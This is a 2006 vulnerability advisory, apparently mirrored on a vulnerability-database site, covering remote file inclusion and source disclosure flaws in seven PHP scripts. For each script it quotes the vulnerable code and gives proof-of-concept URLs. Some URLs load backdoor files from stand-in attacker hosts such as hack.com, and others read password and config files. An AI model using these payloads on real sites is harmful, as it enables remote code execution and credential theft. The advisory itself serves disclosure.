Lucene search
Basic search
Lucene search
Search by product
Subscribe
K
Start 30-day trial
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
SIGN IN
Securityvulns
SECURITYVULNS:DOC:14625
History
Oct 11, 2006 - 12:00 a.m.
7 php scripts File Inclusion / Source disclosure Vuln
2006-10-11
00:00:00
vulners.com
72
JSON
Title…: 7 php scripts File Inclusion Vuln / Source disclosure
Credits: DarkFig
Og.link:
http://acid-root.new.fr/poc/13061007.txt
Using
http://www.google.com/codesearch
Few examples about what we can do with a code search engine
For educational purpose only.
You can use regex in your research, this can be chaotic.
What's your opinion about the google code search project ?
Affected.scr: TribunaLibre v3.12 Beta
Download…:
http://www.phplibre.com.es/downloads/TribunaLibre_v3.12_Beta.zip
Poc…:
http://victim.com/ftag.php?mostrar=http://backdoor.txt
?
Vuln.code…: Line 106, <? include($_GET['mostrar']); ?>
Affected.scr: registroTL
Download…:
http://www.phplibre.com.es/downloads/registroTL.zip
Poc…:
http://victim.com/main.php?page=ftp://hack.com/backdrphpext
http://victim.com/usuarios.dat
<- Passwords disclosure
Vuln.code…: if (isset($_GET['page']) && file_exists($_GET['page'].".php"))
include($_GET['page'].".php");
Affected.scr: compteur_v2
Download…:
http://zebigbrozer.free.fr/compt_new/compteur_v2.zip
Poc…:
http://victim.xx/param_editor.php?folder=http://hack.c/backd.txt
?
Vuln.code…: Line 9 , include($_GET["folder"]."param.php")
Affected.scr: eboli
Download…:
http://www.jhjgubbels.nl/eboli/eboli.tar.gz
Poc…:
http://x.com/index.php?contentSpecial=http://hack.c/back.txt?&content
Vuln.code…: Line 45, if(isset($_GET['contentSpecial']) && isset($_GET['content'])){
include($_GET['contentSpecial']);
Affected.scr: Jasmine-Web
Download…:
http://www.sourcefiles.org/Utilities/Printer/Jasmine-Web-0.0.2.tar.bz2
Poc…:
http://victim.pl/index.php?section=ftp://hack.com/backdrphpext
Vuln.code…: if (isset($_GET['section']) && file_exists($_GET['section'].".php")){
include_once($_GET['section'].".php");
Affected.scr: Foafgen v0.3
Download…:
http://www.toxi.co.uk/foafgen/foafgen_v0.3.0.zip
Poc…:
http://victim.com/redir.php?foaf=file.php
Vuln.code…: Line 4, readfile($_GET['foaf']);
Affected.scr: Album Photo Sans Nom v1.6
Download…:
http://scripts.bezut.info/releases/APSN/albumV1.6.tgz
Poc…:
http://victim.pl/getimg.php?img=config.inc.php
Vuln.code…: Line 47, readfile($_GET['img']);
JSON